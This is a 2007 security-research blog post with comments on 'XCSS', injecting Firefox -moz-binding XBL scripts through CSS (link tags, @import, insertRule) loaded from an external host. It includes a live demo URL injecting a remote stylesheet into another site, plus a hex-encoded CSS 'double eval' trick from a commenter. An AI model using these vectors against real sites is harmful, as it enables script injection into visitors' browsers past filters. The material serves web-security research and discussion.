XCSS
Tuesday, 20 November 2007
I thought I’d continue the theme of experimenting with XSS and trying different things, I haven’t seen this written about anywhere so here goes. The idea is using CSS as a XSS payload, this can be useful when filters allow some things but make it difficult to construct an attack.
I’ve decided to call it XCSS (Cross site Cascading Style Sheets) and there are many ways you can inject them into a document, I’ll show how to do it in Firefox but it will be possible with other browsers as well.
Step 1 – A moz binding document
We first need a moz binding document to demonstrate this method, a sample one can be found here:-
Moz Binding sample
I’m not going to explain the details of what one can do, so if you want to find out more than just Google it. This example simply injects a Javascript alert.
Step 2 – Embedding the style
There are many ways of embedding a stylesheet into a document, here I’ll show you three.
1.
<link href="//businessinfo.co.uk/
labs/xbl/xbl.xml#xss" rel="stylesheet" type="text/css" />
2.
<style type="text/css">@import
url("//businessinfo.co.uk/labs/xcss/xcss.css");</style>
3. Finally using javascript to add a rule to an existing style sheet:-
<script type="text/javascript">
function performXCSS() {
css = document.styleSheets.item(0);
css.insertRule('body
{-moz-binding:url("//businessinfo.co.uk/labs/xbl/xbl.xml#xss");}', 0);
}
</script>
<a href="javascript:performXCSS();">Perform XCSS</a>
No. 1 — November 21st, 2007 at 12:10 am
Here’s a live demo of XCSS injection:-
http://www.csszengarden.com/?cssfile=//businessinfo.co.uk/labs/xcss/xcss.css
No. 2 — November 21st, 2007 at 2:39 am
You haven’t seen it written about anywhere because its been on Rsnake’s Cheat Sheet for as long as I can remember, and so no-one has felt the need to write a post about it, since it was assumed we all knew it existed.
No. 3 — November 21st, 2007 at 3:06 am
Yeah ok I missed it on rsnake’s cheatsheet but so what?
Just because someone creates a list of vectors doesn’t mean that someone can’t post new ideas of exploiting it.
I was going to continue this post with information about exploiting different browsers at once and rewriting urls and changing content in Opera. But hey the cheatsheet apparently tells all.
Please direct me to the place in the cheatsheet where it mentions insertRule? I’ve checked but I couldn’t find it.
No. 4 — November 21st, 2007 at 4:10 am
The technique “-moz-binding” is old but the delivery method is “new” for lack of a better word (using insertrule).
Eitherway though (1 & 2) means i have free range with the css and I would probably target something more generic that would affect more browsers other then just firefox.
And with 3 why would I bother using that technique. no offence, but you would be hard pressed to find a site that allows script tags and functions but filters out src etc.
Finally, XCSS is wrong, is it cross site scripting only. if we go down the path of giving every single attack method an acronym then I want to claim IXSS (which is image cross site scripting [think IE]). Also what about RXSS (Redirect cross site scripting) or FXSS (Flash cross site scripting) etc… but you get my idea.
Still, i look forward to your work on persistant xss via css (if possible).
No. 5 — November 21st, 2007 at 9:03 am
I think it’s not important if something has already been written somewhere. Especially WebAppSec is an extremely large field and thus it’s important to persist facts vie repetition and extension. In fact I haven’t looked inside the document.styleSheets property that deep yet – this article made me and that’s good because i found a nice way to use thigs inside this property for my work.
And while playing I found out that including an URL like http://www.google.com is tolerated by the browser and nodes in the including document even apply the styles coming from http://www.google.com.
<html>
<link rel=”stylesheet” href=”http://www.google.de/” type=”text/css” />
<script>
window.onload = function() {
console.dir(document.styleSheets)
}
</script>
<body class=”h”>
TEST
</body>
</html>
Maybe this has been written about somewhere else but at least it was new to me 🙂
No. 6 — November 21st, 2007 at 9:42 am
Ah – and there’s one more thing to add – check out the double eval 🙂
<style>
body:after{
content: “\61\6c\65\72\74\28\31\29”
}
</style>
<script>
eval(eval(document.styleSheets[0].cssRules[0].style.content))
</script>
No. 7 — November 21st, 2007 at 10:10 am
I may have been a bit abrupt when I posted that comment, but I still stand by it.
The Cheat Sheet isn’t exactly some obscure text file which has never been indexed by google. And googling for “-moz-binding” XSS would have gotten you results, hell I linked the the part of the Cheat Sheet which mentioned the issue in a slackers thread which you later replied to.
Anyway, I know that the insertRule thing is obscure, but it really doesn’t help us anywhere, since our main interest in -moz-binding is its uses for XSS, which is pretty useless if we can execute js already. And anyway, is it any better than simply editing the style attribute directly via javascript as most developers do?
But having said that, I don’t want to stop you exploring and innovating, I just thought I ought to mention its not new. So if you have something new, please go ahead, I’m very eager to see people do new things, and as frustrating as it is when someone points out to you that its already been published, you should just take it on board, and publish something new on the same issue to spite me :p
No. 8 — November 21st, 2007 at 11:19 am
@Mario
Excellent stuff! I’m sure there’s loads more to explore in this area.
@digi7al64
Yeah the acronym might not work but I don’t really care, I just wanted to call my blog post something interesting. Yes you’re right that the delivery of insertRule may be obscure and rare but I liked it and found it interesting and I’m sure not many people are aware of it.
@kuza55
The way I conduct my research is always in a manual manner and rarely do I use cheatsheets or xss proxies etc because of this I sometimes publish things that are already mentioned elsewhere, this is purely an accident and I’m not trying to steal anyone’s work, in future however I’ll check the cheatsheet more throughly.
I feel that this post provides information that is very useful than just using the method listed in the cheatsheet because:-
1. InsertRule method is mentioned and changing the stylesheet dynamically.
2. Assigned MozBinding via a stylesheet has never been explained or mentioned anywhere as far as I know.
3. A live example of the method which demonstrates that allowing external stylesheets are a bad idea.
Why should I have to justify all this though? The cheatsheet doesn’t make every blog post on XSS obsolete.
No. 9 — November 23rd, 2007 at 3:31 am
@Gareth Heyes: sorry but not a new vector or something new, insertRule or appendChild or xxYY doesn’t change this fact
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0933.html
mistake happens : ) why don’t simply acknowledge? nobody is blaming you here
[fun]ouch, found BXSS! “behavior: url(xss.htc);”, it can be embedded in an external css! :D[/fun]
No. 10 — November 23rd, 2007 at 9:15 am
@ascii
Yeah ok it’s a mistake, I hadn’t read it anywhere before but forgive me defending myself when I get a lot of negative comments for trying to do things different.
No. 11 — November 26th, 2007 at 12:02 am
no problem, you do good research! 🙂